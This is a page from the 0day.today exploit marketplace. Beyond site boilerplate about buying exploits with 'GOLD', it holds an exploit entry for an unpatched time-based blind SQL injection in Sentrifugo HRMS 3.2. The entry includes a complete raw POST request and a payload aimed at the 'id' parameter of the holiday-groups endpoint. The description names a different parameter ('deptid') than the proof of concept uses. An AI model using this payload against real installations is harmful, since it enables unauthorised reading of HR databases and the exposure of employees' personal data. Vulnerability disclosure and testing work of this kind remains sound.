0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sentrifugo HRMS 3.2 - (id) SQL Injection Vulnerability
# Exploit Title: Sentrifugo HRMS 3.2 - 'id' SQL Injection # Exploit Author: minhnb # Vendor: http://www.sapplica.com # Software Link: http://www.sentrifugo.com/download # Affected Version: 3.2 and possibly before # Patched Version: unpatched # Category: Web Application # Platform: PHP # Tested on: Win10x64 & Kali Linux # CVE: N/A # 1. Technical Description: # Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid # parameter through POST request in "/sentrifugo/index.php/holidaygroups/add" resource. # This allows a user of the application without permissions to read sensitive information from # the database used by the application. # 2. Proof Of Concept (PoC): POST /sentrifugo/index.php/holidaygroups/add HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://localhost/sentrifugo/index.php Connection: keep-alive Cookie: PHPSESSID=j4a2o4mq6frhfltq2a0h2spknh Accept: */* Accept-Encoding: gzip,deflate Content-Length: 98 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate()%2Csleep(9)%2C0))XOR'Z&submit=Save # 3. Payload: Parameter: id (POST) Type: time-based blind Title: MySQL >= 5.0 time-based blind - Parameter replace Payload: Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z&submit=Save # 4. Reference: # 0day.today [2024-11-15] #